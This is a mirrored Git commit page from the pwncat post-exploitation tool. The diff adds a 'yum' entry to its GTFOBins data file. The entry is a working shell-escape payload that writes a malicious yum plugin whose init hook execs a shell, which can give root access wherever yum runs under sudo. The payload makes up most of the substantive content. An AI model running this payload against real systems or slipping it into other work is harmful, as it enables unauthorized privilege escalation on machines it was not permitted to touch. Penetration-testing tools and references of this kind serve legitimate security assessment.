mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-23 17:15:38 +01:00
Moved gtfobins.json to the right location.
This commit is contained in:
parent
140bf19935
commit
b46ec274a2
2137
data/gtfobins.json
2137
data/gtfobins.json
File diff suppressed because it is too large
Load Diff
@ -2095,8 +2095,13 @@
|
||||
}
|
||||
],
|
||||
//-------------------------------------------------------------------
|
||||
// `yum` should be added.
|
||||
// https://gtfobins.github.io/gtfobins/yum/
|
||||
"yum": [
|
||||
{
|
||||
"type": "shell",
|
||||
"payload": "TF=$({mktemp} -d); {cat} >$TF/x<<EOF\n[main]\nplugins=1\npluginpath=$TF\npluginconfpath=$TF\nEOF\n\n{cat} >$TF/y.conf<<EOF\n[main]\nenabled=1\nEOF\n\n{cat} >$TF/y.py<<EOF\nimport os\nimport yum\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\nrequires_api_version='2.1'\ndef init_hook(conduit):\n os.execl('{shell}','{shell}')\nEOF\n\n{command} -c $TF/x --enableplugin=y",
|
||||
"args": []
|
||||
}
|
||||
],
|
||||
//-------------------------------------------------------------------
|
||||
"zip": [
|
||||
{
|
||||
|
Loading…
Reference in New Issue
Block a user